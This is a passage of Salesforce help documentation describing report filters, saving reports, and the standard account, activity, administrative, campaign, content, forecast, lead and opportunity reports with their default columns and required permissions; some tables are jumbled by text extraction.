For example, if you enter “Number of Employees between 100 and 500,” your results
include accounts with 100 employees up to those with 499 employees. Accounts with
500 employees aren’t included in the results.

between

Available when you create list views based on a Geolocation custom field. Shows results
that are within the specified radius from a fixed latitude and longitude. For example, if

within
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UsesOperator

you enter “Warehouse location within 50 miles 37.775° –122.418°,” your list view includes
all warehouses within a 50–mile radius of San Francisco, California.

See Also:
Filter Your Report Data
Filter Your Report Data
Enter Filter Criteria

Save Your Report

Click Save to update an existing report with recent changes, or Save As to clone the original report without changing it.

Available in: All Editions except Database.com

User Permissions Needed

“Create and Customize Reports”

AND
“Report Builder”

To create, edit, and delete reports:

“Customize Application”To enter a unique report name used by theAPI:

“Manage Public Reports”To select a folder to store public reports:

1. Verify the name, description, and folder, then choose where to go next:

• Click Save to save the report and go to the Reports home page
• Click Save & Return to Report to save it and go back to the report run page.

Note:  To save your report at a specific role hierarchy drill-down level on sales, forecast, opportunity, and activity
reports, select Save Hierarchy Level.

Tip:  If you add a colon to your report name, it displays in two separate lines when you view the report. Use this to
categorize reports by name, or better display long names. For example, if you enter First Line: Second Line
for Report Name, you'll see this on the run page:

See Also:
Build a New Report
Filter Your Report Data
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Build a Report From a Template
Salesforce provides a rich collection of standard report types that you can tailor to your unique requirements. You rarely need
to create a brand-new report.

Available in: All Editions except Database.com (The edition determines which reports you see.)

User Permissions Needed

“Run Reports”To run reports:

“Create and Customize Reports”To create, edit, and delete reports:

Note:  You may not see some of these folders if your administrator has customized the visibility of the Report tab
folders.

If you can’t find a report to customize for your own needs, you can also create a new custom report to access exactly the right
information.

See Also:
Get the Right Data into Your Report
Account and Contact Reports
Activity Reports
Administrative Reports
Campaign Reports
Salesforce CRM Content Reports
Forecast Reports
Lead Reports
Opportunities Reports
Product and Asset Reports
Self-Service Reports
Support Reports
Territory Reports
The Report Run Page
Activity Reports
Creating a Custom Report
Forecast Reports
Gather Data with Reports
Opportunity Reports
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Account and Contact Reports

Use account and contact reports to learn about active, neglected, or new accounts, as well as accounts by account owner or
partner. The two standard contact reports let you create a mailing list of contacts or track opportunities by contact role.

Available in: All Editions except Database.com (The edition determines which reports you see.)

Special Features of Account and Contact Reports

Consider the following when running account and contact reports:

Standard Reports

• If your organization tracks field history on accounts or contacts, you can report on that information using the account
history or contact history report.

• If your organization uses person accounts, fields specific to person accounts are available and prefixed with Person
Account: in account reports. In addition, you can include the Is Person Account field in both account and
contact reports. Note that your administrator may have renamed Person Account to another term, which will
display here.

Tips for Account and Contact Reports

• You can also create a report of your contact information, export that data to Excel, and then do a mass mail merge
using Microsoft® Word.

• The Last Activity of an account and contact is the most recent due date of an activity on the record. The following
past or future activities set this date: Any event and closed tasks. Since activities roll up through associated records,
the Last Activity date on an account can be an activity on a contact, opportunity, or other associated record.

• The standard View filter for account reports allows you to limit your account data according to the following options.
These options vary depending on your organization's edition and setup.

◊ My accounts—Shows accounts that you own.
◊ My account team accounts—Shows accounts where you are on the account team.
◊ My account team and my accounts—Shows accounts you own and those where you are on the account team.
◊ My team's accounts—Shows your accounts and accounts owned by all of your subordinates in the role hierarchy.
◊ My territories—For organizations that use territory management, this option shows accounts that belong to the

territories to which you are assigned.
◊ My territory team's accounts—For organizations that use territory management, this option shows accounts that

belong to your territories and your territories' descendants.
◊ My team's account team and their own accounts—For users who report to you in the role hierarchy, shows

accounts they own or for which they are on the account team.
◊ All visible accounts—Shows all accounts that you can view, as determined by your sharing model.
◊ Territories—For organizations that use territory management, the additional Territories filter can be set to

All, Multiple Territories, or Missing Territory. In custom report types, when using the Territories filter that
includes territories, Multiple Territories or Missing Territories are not shown in the report results.
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◊ If your organization uses a Salesforce Customer Portal, add the Customer Portal Account field to your
account reports to view which accounts have contacts enabled to use the portal.

See Also:
Build a Report From a Template
The Report Run Page
Limit Report Results
Build a Report From a Template

Activity Reports

Activity reports are useful for gathering information about open activities, completed activities, multi-person events, or pending
approval requests for which you are a delegated approver.

Available in: All Editions except Database.com (The edition determines which reports you see.)

Standard activity reports allow you to select the date range and status of the activities you want included. The standard activity
reports list your tasks and appointments for a selected date range or events with all invitees.

You can also create custom reports for activities by clicking the Reports tab, New Report, and choosing Activities as the type
of data on which to report.

Special Features of Activity Reports

Consider the following when running activity reports:

Standard Reports

• Choose the HTML Email Status report if you have the HTML email tracking enabled. This reports on anything
in the HTML Email Status related list of your leads and contacts.

• Choose the Events with Invitees report to include only multi-person events in your report. The standard filters for
events with invitees are:

◊ Assigned to...—Shows only multi-person events that you own.
◊ Assigned to the team of...—Shows multi-person events that anyone in your team owns.
◊ Invitee is...—Shows only multi-person events that list you as an invitee.
◊ Invitee is in the team of...—Shows the multi-person events that show anyone on your team as an invitee.

• The My Delegated Approval Requests report lists all the approval requests for which you are the approval proxy.
Note that the All Pending Approval Requests report is listed in the Activity Reports folder.

• In Professional, Enterprise, Unlimited, and Developer Edition organizations, to show the activities for users who
report to you, use the Hierarchy links in the Tasks and Appointments report. Note that you can view only your own
activities and activities owned by users below you in the role hierarchy.

Report Types

• Using report builder, you can create activity reports that show activities related to another type of record. For example,
a custom Activities with Leads report shows activities associated with leads.
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• Activities with Leads reports do not display data for the Address Line 1, Address Line 2, and Address
Line 3 fields.

Tips for Activity Reports

• Set a search criteria of “Event Invitation equals 0” to filter out events that are meeting invites sent to users for a
multi-person event.

• Archived activities are not included in reports. Events and closed tasks older than a year are archived. However, open
tasks are not archived. You can still see archived activities for a record by clicking View All in the Activity History
section of a record's detail.

• Activities for private contacts only show up in reports for the contact owner.
• The standard filters for activity reports allow you to limit your report results using the following options. Some of

these options will not be visible depending on your edition.

◊ My Activities—Shows activities that you own.
◊ My Delegated Activities—Shows activities that you created but are owned by someone else in the same role as

you, and below your role, in the role hierarchy.
◊ My Team's Activities—Shows activities owned by users who report to you in the role hierarchy.
◊ All Activities—Shows all activities that you can view, as determined by your sharing model.

• If you receive an error message that your activity report has too many results, customize the report to include a filter
on a picklist, text, or date field. Alternatively, rerun the report using a different activity data type such as “Activities
with Accounts” or “Activities with Opportunities.”

See Also:
Build a Report From a Template
The Report Run Page
Limit Report Results
Build a Report From a Template

Administrative Reports

Administrative reports help you analyze your Salesforce users, documents, and pending approval requests. You can report on
the active Salesforce users and see who has been logging in.

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions
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User Permissions Needed

“View Setup and Configuration”To view the Administrative Reports folder:

“Run Reports”

AND

“View Setup and Configuration”

To run user reports:

“Create and Customize Reports”

AND

“View Setup and Configuration”

To create, edit, save, and delete user reports:

“Run Reports”To run document reports:

“Create and Customize Reports”To create, edit, save, and delete document reports:

“Run Reports”

AND

“View All Data”

To run pending approval request reports:

Note:  You can see the Administrative Reports folder on the Reports tab only if you have the “View Setup and
Configuration” permission. You don't need this permission to view the Administrative Reports report type—all users
can view it and manage any document reports associated with that type. To view other types of reports associated
with that type, such as user and approval request reports, you must have the permission.

Special Features of Administrative Reports

Consider the following when running administrative reports:

Standard Reports

• The All Active Users report lists the active users in your organization and when they last logged in.
• The Users Logged in This Week report lists all of the users who have logged in to Salesforce in the past seven days.
• The Documents report lists the documents within each document folder.
• The All Pending Approval Requests report lists the approval requests awaiting approval for each approval process.

Note that the My Delegated Approval Requests report is listed in the Activity Reports folder.
• If your organization uses territories, the User Territory Report in the Territory Reports folder summarizes the

territories to which users have been assigned.

Report Types

• Create a custom report that lists your organization’s reports and the last time each report was used. Choose
Administrative Reports and select Reports as the report type.

• If your organization uses a Salesforce Customer Portal, you can report on Customer Portal users:

1. Create a custom report.
2. Choose Administrative Reports.
3. Select Users as the report type.
4. Add License Type, Profile, and Role to your report columns. You can’t report on roles for high-volume

portal users because they don’t have roles.
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Note:  Permission sets aren't supported.

You can also add the Customer Portal Account field to your account reports to view which accounts have
contacts enabled to use the portal.

• You can create custom report types from which users can report on your organization's reports and dashboards. When
defining a custom report type, select Reports or Dashboards from the Primary Object drop-down list on the New
Custom Report Type page.

Tips for Administrative Reports

• Users with the “Manage Users” permission can create a custom user report that lists the details of users' login attempts.
The relevant fields—such as Login Date/Time, Source IP Address, and Login Status—are grouped in
the Login History section of the Select Columns step. Note that the Client Type field shows whether the user
logged in via a Web browser or an alternate interface such as Connect for Lotus Notes or a partner portal. You can
also see which users have never logged in by setting report criteria: choose the Login Date/Time field and the
“equals” operator and leave the third value blank.

See Also:
Build a Report From a Template
The Report Run Page
Limit Report Results
Build a Report From a Template

Campaign Reports

Use campaign reports to analyze your marketing efforts. You can report on the ROI of your campaigns, track who you targeted
with your campaigns and who has responded, or analyze which opportunities resulted from your campaigns.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

Special Features of Campaign Reports

Consider the following when running Campaign Reports:

Standard Reports

• On the Campaign Detail custom report and the Campaign ROI Analysis report, you can include campaign-hierarchy
statistics that provide aggregate values for a parent campaign and all the campaigns below it in the campaign hierarchy.
If your campaigns include a custom picklist that indicates hierarchy level (for example, “tactic,” “program,” and
“initiative”), you can run a report that summarizes data at any hierarchy level across all campaigns.

• Use the Campaign Leads or Campaign Contacts reports to list the leads or contacts associated with your campaigns.
• Use the Campaign Member Report for a list of campaign members by campaign.
• Use the Campaign Member Analysis report to summarize information about who has responded to campaigns.
• Use the Campaign Revenue Report to analyze which opportunities have resulted from your campaigns. In Enterprise,

Unlimited, and Developer Editions, you can also analyze products, quantity schedules, and revenue schedules in this
report.
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• The Campaign ROI Analysis Report calculates the return on investment (ROI) and average costs for your campaigns.
The ROI is calculated as the net gain (Total Value Won Opps - Actual Cost) divided by the Actual Cost.
The ROI result is expressed as a percentage.

• Use the Campaigns with Influenced Opportunities report to view opportunities that have been influenced by multiple
campaigns.

Note:  The Campaigns with Influenced Opportunities report respects sharing rules on accounts, contacts,
and campaigns. Objects with sharing rules set to private will not display in the report.

Report Types

• Use the Campaigns with Campaign Members custom report type to create a report that contains information about
the leads and contacts on multiple campaigns. Use the Campaign Call Down report to see contacts and leads for a
specific campaign. These reports are only available to users that have the “Read” permission on both contacts and
leads.

• Use the Campaigns with Leads and Converted Lead Information report to view lead lifetime information sorted by
a campaign or campaigns.

• Use the Campaigns with Influenced Opportunities report to view opportunities that have been influenced by multiple
campaigns.

Tips for Campaign Reports

• Some reports allow you to limit the data to one campaign by using the lookup icon to select a campaign. If the user
running a report no longer has access to view the selected campaign, the report does not show any results. This report
behavior is similar to what happens when a campaign is deleted.

• Member Status is the status of a lead or contact in reference to the campaign. The campaign owner can create up
to 50 member status values. Sample Member Status values include, “Planned,” “Sent,” or “Attended.” Additionally,
you can now add the Member First Associated, Responded, and Member First Responded fields to
campaign reports. These fields allow you to see the date the member was added to the campaign, whether the member
responded to the campaign, and the date the member initially responded to the campaign.

• The Last Activity of a campaign is the most recent due date of an activity on the record. The following past or
future activities set this date:

◊ Any event
◊ Closed tasks

See Also:
Build a Report From a Template
The Report Run Page
Limit Report Results
Build a Report From a Template
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Salesforce CRM Content Reports

Use CRM Content reports are available to analyze Salesforce CRM Content data. Find out such things as what is in each
library, how much storage each library uses, or which files and content packs are downloaded most.

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

Special Features of Salesforce CRM Content Reports

Standard Reports

• Use the Library Content report to view the number of files, content packs, Google docs, and Web links in each
library as well as the total amount of file storage used by each library.

• Use the Content Publication Time Frame report to determine how many files, content packs, Google docs, and Web
links were published in a library during a given time period.

• Use the Library Administrators report to determine which users have administrative rights in the library. A library
administrator is a user who has the Manage Content option checked in his or her library permission.

• Use the Most Content Downloads report to determine which files and content packs are downloaded most frequently
and which Web links and Google docs are opened most frequently.

• Use the Most Content Subscriptions report to determine which files, content packs, Google docs, and Web links
have the most subscribers.

• Use the Stale Content report to determine which files have not been downloaded or revised recently.
• Use the Content Authors report to view how many files, content packs, Google docs, and Web links each author

has published in Salesforce CRM Content.

Report Types
Use the Salesforce CRM Content report type to analyze data from standard and custom fields in your Salesforce CRM
Content library. The Salesforce CRM Content report type offers two custom reports:

Content Report
This report type allows you to analyze and sort by any of the content report fields.

Library and User Report
This report type generates a list of users who are assigned to libraries.

Tips for Content Reports

• Salesforce CRM Content users who have the Manage Content option checked in their library permission can sort
report data by the library they have access to (“My Libraries”) or by all the libraries in an organization (“All Libraries”).
Users without the Manage Content option can only sort data by the libraries they have access to.

• Sort custom reports by Library Name to view data for individual files as well as library summaries, such as total
storage used and total number of downloads.

• Sort according to the Content ID to view data for a particular document.
• If you have Customer Portal or partner portal users with the “Create Libraries” user permission, run the Library

Administrators report to determine which new libraries have been created by portal users.

Content Report Fields

You can report on any of the following fields in Content custom reports. Depending on the report, these fields are also available
in standard reports.
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DescriptionField

Flag that indicates whether a file has been archived. Archiving a file removes it from its
library but does not permanently delete the file from Salesforce CRM Content. Archived
files can be restored as needed.

Archived

Contributor who published the file, content pack, Google doc, or Web link.Content Created By

Identifier that enables you to group by file rather than version. The Content Title is
not guaranteed to be unique because multiple versions of the same file can have different
titles.

Content ID

Date a file, content pack, Google doc, or Web link was first published.Content Published Date

Title of a file, content pack, Google doc, or Web link.Content Title

Title of the content type associated with the file, content pack, Google doc, or Web link.Content Type

Flag that indicates whether a piece of content is featured.Featured Content

Size of an individual file, exclusive of other versions of the same file.Individual Content Size
(MB)

Date on which the content was subscribed to most recently.Last Subscribed Date

Number of times a file has been downloaded or the total number of downloads in a
library. The number of times a Google doc or Web link has been opened is also included
in this count.

Num Downloads

Tip:  To see which users have downloaded a certain file, go to the file's content
details page and click the Downloads tab.

Number of thumbs-down votes.Num Negative Ratings

Number of thumbs-up votes.Num Positive Ratings

Number of users who are subscribed to a file, content pack, Google doc, or Web link, or
the total number of subscriptions in a library.

Num Subscriptions

Number of times a new version of a file has been published.Num Versions

The number of positive votes minus the number of negative votes. For example, if a file
has two positive votes and no negative votes, its Overall Rating is 2.

Overall Rating

Salesforce CRM Content tag assigned to a file, content pack, Google doc, or Web link.Tag

Size of a file, inclusive of all the file's versions.Total Content Size (MB)

Date and time a new version of the file was published.Version Revised Date

Contributor who published the file version.Version Revised By

Name of the library.Library Name
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DescriptionField

Date and time the library was created.Library Created Date

See Also:
Build a Report From a Template
The Report Run Page
Limit Report Results
Build a Report From a Template

Forecast Reports

Forecast reports give you information about your customizable forecast data.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

Note:  If you don't see the Forecast Reports folder, your organization may not have customizable forecasting enabled.
Report builder doesn’t support Customizable Forecasts.

Special Features of Customizable Forecast Reports

Consider the following when running customizable forecast reports:

Standard Reports
Create a forecast history report if you want the report to include information about forecasts you already submitted.
Select All Forecasts to show the state of the forecasts after each update. Choose Latest Forecasts to display
only the current state of the forecasts.

Report Types

• When creating a custom forecast report, choose the Customizable Forecast: Opportunity Forecasts report type if
you want to include information about the opportunities that contribute to your forecast.

• You can include custom user fields in custom opportunity forecast reports as columns and as column values. Custom
user fields are available as either opportunity owner or account owner custom information. The custom field label
will be used for both opportunity owner or account owner information, which can cause confusion if they are both
on the same report and have similar field labels.

• If you have the “View All Forecasts” permission, forecast summary and forecast history reports include all users' data
for the chosen forecast hierarchy, including users in branches of the forecast hierarchy that have no forecast manager.

Tips on Customizable Forecasting Reports

• You must specify a reporting interval by fiscal year or by date.
• Forecast reports include private opportunities.
• Opportunity amounts are included in forecast reports if the opportunity is set to close within the forecast period.
• Forecast reports include only opportunities that are set to close within the forecast period, except those assigned to

the Omitted forecast category.
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• Create a forecast summary report if you want to view information about the amounts in your forecast without details
of the opportunities that contribute to that amount.

• If your organization uses territories, you can create custom forecast reports that summarize information by territory
name.

• You can view an opportunity forecast report based on the forecast hierarchy by drilling down in your forecast hierarchy.

1. Select the desired role or territory from the Hierarchy links.
2. Choose the appropriate forecast users or teams from the Show Opportunities Owned By or Show Forecasts

Owned By scopes at the top of the report.
3. Click Run Report again to refresh the report data for your chosen parameters.

For example, to see your opportunity information, including your overrides on opportunity amounts or quantities
and overrides from users below you in the forecast hierarchy, set the Hierarchy link to your forecast role. To see the
opportunity information of someone beneath you in the forecasting hierarchy, drill down into that role.

Warning:  The My Team view shows forecasts across multiple hierarchy levels. Consequently, values may
be included in a subordinate's forecast total and a forecast manager's forecast total. This may lead to larger
than expected values in the column total because subordinate amounts are included multiple times in the
total.

See Also:
Build a Report From a Template
The Report Run Page
Limit Report Results
Build a Report From a Template

Lead Reports

Use lead reports to show information about the source and status of leads, how long it takes to respond to leads, neglected
leads, and the history of lead fields.

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

Special Features of Lead Reports

Consider the following when running lead reports:

Standard Reports

Choose the Lead History report type to track the history of standard and custom fields on leads where field histories are set
to tracked. Use this report to see tracked fields' old and new values.

Tip:  If you have the “Create and Customize Reports” permission, you can use the View drop-down on a Lead History
Report to view lead history data by My Leads, My Team's Leads, User Owned Leads, Queue Owned Leads, and All
Leads.
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Tips for Lead Reports

• Limit your report view to “My team’s leads” to see leads owned by users who report to you in the role hierarchy.
• Lead reports can show all leads, both converted and unconverted. To limit your report to just unconverted leads, enter

filter criteria of “Converted equals 0.”
• The Last Activity of a lead is the most recent due date of an activity on the record. The following past or future

activities set this date:

◊ Any event
◊ Closed tasks

• You can create a report of your lead information, export that data to Excel, and then do a mass mail merge using Microsoft®
Word.

Lead Report Limitations

• You can't use filter conditions to search the results of the Old Value and New Value fields.
• You can’t use filter logic if you are filtering by Field/Event.

See Also:
Build a Report From a Template
The Report Run Page
Limit Report Results
Build a Report From a Template

Opportunities Reports

View standard information about your opportunities, including owners, accounts, stages, amounts, and more. The default
settings show you the most commonly used information from each object, but you can customize the report to view other
information, such as primary campaign source, forecast category, and synced quote.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

The default settings for this report are:

Format

Tabular

Selected Columns

ColumnsObject Information Type

Opportunity Information • Opportunity Name

• Amount

• Close Date

• Stage

• Age
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ColumnsObject Information Type

• Type

• Probability (%)

• Lead Source

• Fiscal Period

• Next Step

• Created Date

Opportunity Owner Information • Opportunity Owner

• Owner Role

Account Information • Account Name

See Also:
Build a Report From a Template
Opportunity Reports
Opportunities with Competitors Report
Opportunities with Contact Roles and Products Report
Opportunities with Contact Roles Report
Opportunities with Partners Report
Opportunities with Products Report
Opportunities with Quotes and Quote Line Items Report
Opportunities with Quotes and Quote PDFs Report
Opportunities with Opportunity Teams and Products Report
Opportunities with Opportunity Teams Report
Opportunity Field History Report
Opportunity History Report
Opportunity Trends Report
Create a Custom Opportunity Report
The Report Run Page
Limit Report Results
Opportunity Reports
Build a Report From a Template

Opportunity Reports

Opportunity reports provide information about your opportunities, including owners, accounts, stages, amounts, and more.
The default settings show you the most commonly used information from each object, but you can customize a report to view
other information, such as primary campaign source, forecast category, and synced quote.

Available in: Professional, Enterprise, Unlimited, and Developer Editions
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If your organization uses Forecasts or Customizable Forecasts, you'll see forecast report options paired with opportunity report
options in the standard reports folders and the custom reports wizard. Opportunities owned by users who do not have a role
in your organization's hierarchy are omitted from opportunity, forecast, and sales reports. This restriction does not apply to
Personal or Group Edition organizations, which do not have a role hierarchy. For reports that include the Partner column
(except for the Partner Opportunities report), only the primary partner of the opportunity is displayed.

See Also:
Opportunities Reports
Tips for Working with Opportunity Reports
Use Standard Opportunity Reports
The Report Run Page
Limit Report Results
Build a Report From a Template

Tips for Working with Opportunity Reports

Opportunity reports can include all opportunity fields plus some extra columns for additional detail.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

• You can use the following columns to provide additional detail:

◊ Age—For an open opportunity, the number of days since the opportunity was created. For a closed opportunity, the
number of days between the creation date and the closed date.

◊ Stage Duration—The number of days the opportunity was in the stage listed in the Stage column. You can run
the Opportunity Stage Duration report to see how much time an opportunity spent at different stages.

◊ Last Activity—The most recent due date of an activity on the opportunity record, including any opportunity event
or closed task.

• Not all Opportunity Product fields are available in report filters. For example, the Product Family field is not available
in Opportunity Product report filters because it is related to that object through the Pricebook Entry object. To make the
Product Family field available in Opportunity Product report filters—for cross-sell or upsell reporting—create a custom
formula field to store its contents and use that formula field in your filter. Click Your Name > Customize > Opportunities
> Opportunity Products > Fields and create a custom field of type Formula, making sure to use Text for your formula
return type and TEXT(PricebookEntry.Product2.Family) for your formula.

• In Professional, Enterprise, Unlimited, and Developer edition organizations, the Hierarchy links let you browse report
results based on the role or territory hierarchies.

• If your organization uses territory management, the Hierarchy filter on opportunity reports lets you view data according
to either the role or territory hierarchies. In addition, the Territories filter lets you display either opportunities from all
territories or opportunities that lack an associated territory.

• You can include the Primary Campaign Source field on all standard opportunity reports. This field is controlled by
field-level security.

• Use the View filter to limit your opportunity report results. View options vary depending on your organization's Edition
and setup.

◊ My opportunities—Shows only your opportunities.
◊ My team-selling opportunities—Shows opportunities for which you are on the opportunity team.
◊ My team-selling and my opportunities—Shows your opportunities and opportunities for which you are on the opportunity

team.
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◊ My team's opportunities—Shows your opportunities and opportunities owned by all of your subordinates in the role
hierarchy.

If your organization uses territory management, the effect of this option depends on the value of the Hierarchy filter
above. If you select Role, you see your opportunities and opportunities owned by all of your subordinates in the role
hierarchy. If you select Territory, you see opportunities that you own and any opportunities owned by your territories'
descendants.

◊ My team's team-selling and their opportunities—For users who report to you in the role hierarchy, shows opportunities
they own or for which they are on the opportunity team.

◊ My territories—For organizations that use territory management, this option shows opportunities that belong to the
territories to which you are assigned.

◊ All opportunities—Shows all opportunities you can view.

See Also:
Opportunity Reports
Opportunity Reports
Create a Custom Opportunity Report
Use Standard Opportunity Reports

Use Standard Opportunity Reports

Using the standard opportunity reports, you can report on your opportunity pipeline and history, opportunity sources, opportunity
types, and more.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Run Reports”To run reports:

“Schedule Reports”To schedule reports:

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

1. In the Folders pane on the Reports tab, select Opportunity Reports.
2. Click the report you want.

DescriptionReport Name

Won opportunitiesClosed Opportunities

Types of available opportunities.Opportunities by Type

Field history on opportunities. Available only if your
organization tracks this information.

Opportunity Field History
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DescriptionReport Name

Status changes on opportunities. Available only if your
organization tracks this information.

Opportunity History

A historical snapshot of your opportunities; opportunity
amounts are grouped by historical stage for specified months.

Opportunity Pipeline Trend

This report is available in Professional, Enterprise,
Unlimited, and Developer Edition organizations only.

Opportunities by stage.Opportunity Pipeline

Opportunities summarized by split information such as
assigned user and percentage.

Opportunity Pipeline with Splits

Opportunities by month and product.Opportunity Product

Split assignments and percentages for each product. You
can also summarize information by these fields:

Opportunity Product Report with Splits

• Split Total Price–Split percentage multiplied by
Total Price.

• Split Expected Product Amount–Split Total
Price multiplied by Probability.

Opportunities by month, including split percentages for the
opportunity team. To access this report, product scheduling
must be enabled for your organization.

You can also summarize information by these fields:

Opportunity Schedule Report with Splits

• Split Total Price–Split percentage multiplied by
Total Price.

• Split Schedule Amount–Split percentage multiplied
by Schedule Amount.

• Split Expected Product Amount–Split Total
Price multiplied by Probability.

• Split Expected Schedule Amount–Split Schedule
Amount multiplied by Probability.

Sources of your opportunities.Opportunity Sources

Duration of an opportunity at each stage.Opportunity Stage Duration

Information about opportunities and opportunity teams to
which you belong.

Opportunity Teams

All partners associated with an opportunity or the primary
partners only. To limit your results to primary partners,

Partner Opportunities

customize the report and enter Primary equals True
on the criteria page of the report wizard.

Open opportunities grouped by stage and then sorted by
age.

Stuck Opportunities
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3. Run the report.

See Also:
Opportunity Reports
Opportunity Reports
Create a Custom Opportunity Report
Tips for Working with Opportunity Reports

Opportunities with Competitors Report

View information about your company's competitors for opportunities, including their strengths and weaknesses.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

The default settings for this report are:

Format

Summary

Selected Columns

ColumnsObject Information Type

Opportunity Information • Opportunity Name

• Close Date

• Amount

Competitor Information • Competitor Name

• Strengths

• Weaknesses

Account: General Information • Account Name

See Also:
Opportunities Reports
The Report Run Page
Limit Report Results
Opportunity Reports
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Opportunities with Contact Roles and Products Report

View information about the contacts and opportunities associated with a selected product. You must select a product to filter
results by when you run the report.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

The default settings for this report are:

Format

Tabular

Selected Columns

ColumnsObject Information Type

Opportunity: Information • Opportunity Name

Product Information • Product Name

Opportunity Owner Information • Opportunity Owner

Account: General Information • Account Name

Contact Role: General • Title

• First Name

• Last Name

Contact Role: Phone/Fax/Email • Phone

• Email

Contact Role: Address • Mailing Street

• Mailing City

• Mailing State/Province

• Mailing ZIP/Postal Code
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ColumnsObject Information Type

• Mailing Country

See Also:
Opportunities Reports
The Report Run Page
Limit Report Results
Opportunity Reports
Build a Report From a Template

Opportunities with Contact Roles Report

View information about the contacts associated with your opportunities, including name, title, and role.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

The default settings for this report are:

Format

Tabular

Selected Columns

ColumnsObject Information Type

Opportunity Information • Opportunity Name

Opportunity Owner Information • Opportunity Owner

Account: General Information • Account Name

Contact Role: General Information • Title

• First Name

• Last Name

Contact Role: Phone/Fax/Email • Phone

• Email

Contact Role: Address • Mailing Street

• Mailing City

• Mailing State/Province
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ColumnsObject Information Type

• Mailing ZIP/Postal Code

• Mailing Country

See Also:
Opportunities Reports
The Report Run Page
Limit Report Results
Opportunity Reports
Build a Report From a Template

Opportunities with Partners Report

View information about the partners you team with on your opportunities, including opportunity name, amount, and partner
role.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

The default settings for this report are:

Format

Summary

Selected Columns

ColumnsObject Information Type

Opportunity Information • Opportunity Name

• Close Date

• Amount

Opportunity Owner Information • Opportunity Owner

Partner Information • Partner Owner

• Partner Role

• Partner

Account Information • Account Owner
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ColumnsObject Information Type

• Account Name

See Also:
Opportunities Reports
The Report Run Page
Limit Report Results
Opportunity Reports
Build a Report From a Template

Opportunities with Products Report

View information about the products associated with your opportunities, including product name and opportunity stage.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

The default settings for this report are:

Format

Matrix

Summary Fields

Total Price (sum)

Selected Columns

ColumnsObject Information Type

Opportunity Information • Opportunity Name

• Amount

• Close Date

• Stage

• Age

• Type

• Probability

• Created Date

Product Information • Product Name

• Product Code

• Quantity

• Active Product
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ColumnsObject Information Type

• Sales Price

• Product Date

• Product Description

• Total Price

• Product: Month

• List Price

Opportunity Owner Information • Opportunity Owner

• Owner Role

Account: General Information • Account Name

See Also:
Opportunities Reports
The Report Run Page
Limit Report Results
Opportunity Reports
Build a Report From a Template

Opportunities with Quotes and Quote Line Items Report

View details about the quotes associated with opportunities, and the line items for each quote. The default settings provide
the most commonly used information from each object, but you can customize the report to see any opportunity, quote, or
quote line item field.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

If your organization uses multicurrency or advanced currency management, you have additional options for customizing this
report. When you select report columns, you can select the “converted” version of an amount or total column to show its value
converted to a different currency. Select the currency you want to convert to under Advanced Settings when you select your
report criteria.

The default settings for this report are:

Format

Summary

Summary Fields

Amount (sum)

Quote Discount (sum)
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Groupings

The default report shows you results grouped first by Opportunity Name and then by Quote Name. Each quote line
item is listed beneath its associated quote.

Selected Columns

ColumnsObject Information Type

Opportunity Information • Opportunity Name

• Amount

Quote Information • Quote Name

• Discount

• Syncing

• Status

Quote Line Item Information • Quote Line Item: Discount

• Product: Product Name

• Line Item Number

• Sales Price

• List Price

• Quote Line Item: Subtotal

• Quote Line Item: Total Price

See Also:
Opportunities Reports
The Report Run Page
Limit Report Results
Opportunity Reports
Build a Report From a Template

Opportunities with Quotes and Quote PDFs Report

View details about the quote PDFs created for each quote associated to an opportunity. The default settings show you the
most commonly used information from each object, but you can customize the report to view other information, such as who
created or last modified each listed quote PDF.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

The default settings for this report are:
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Format

Summary

Grouping

The default report shows quotes and quote PDFs grouped by Opportunity Name.

Selected Columns

ColumnsObject Information Type

Opportunity Information • Opportunity Name

Quote Information • Quote Name

• Syncing

Quote PDF Information • Quote PDF: Created Date

• Quote PDF: Name

• Quote PDF: Discount

• Quote PDF: Grand Total

See Also:
Opportunities Reports
The Report Run Page
Limit Report Results
Opportunity Reports
Build a Report From a Template

Opportunities with Opportunity Teams and Products Report

View information about your opportunity team members and their products, organized by opportunity. You must specify
either a product or an opportunity team member to filter results by when you run the report.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

The default settings for this report are:

Format

Tabular
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Selected Columns

ColumnsObject Information Type

Opportunity Information • Opportunity Name

Product Information • Product Name

Team Member Information • Team Member Name

• Team Role

See Also:
Opportunities Reports
The Report Run Page
Limit Report Results
Opportunity Reports
Build a Report From a Template

Opportunities with Opportunity Teams Report

View information about the members of your opportunity team and their roles, organized by opportunity.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

Note: You must enable and set up team selling to use the Opportunities with Opportunity Teams report.

The default settings for this report are:

Format

Tabular

Selected Columns

ColumnsObject Information Type

Opportunity Information • Opportunity Name

Team Member Information • Team Member Name

• Team Role
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Note:  If your administrator has created custom opportunity team fields, they can be included in the Opportunity
with Opportunity Teams Report.

See Also:
Opportunities Reports
The Report Run Page
Limit Report Results
Opportunity Reports
Build a Report From a Template

Opportunity Field History Report

View information about the change history of key opportunity fields, including old and new values and the dates edits were
made.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

Note:  You must enable and set up field history tracking and select fields in order to use the Field History Tracking
report.

The default settings for this report are:

Format

Tabular

Selected Columns

ColumnsObject Information Type

History Data • Edit Date

• New Value

• Edited By

• Field/Event

• Old Value

Opportunity Fields • Opportunity Name
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ColumnsObject Information Type

Opportunity Owner Information • Opportunity Owner

See Also:
Opportunities Reports
The Report Run Page
Limit Report Results
Opportunity Reports
Build a Report From a Template

Opportunity History Report

View information about the history of your opportunities, including stages and close date.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

The default settings for this report are:

Format

Summary

Selected Columns

ColumnsObject Information Type

Opportunity Information • Opportunity Name

Opportunity Owner Information • Owner

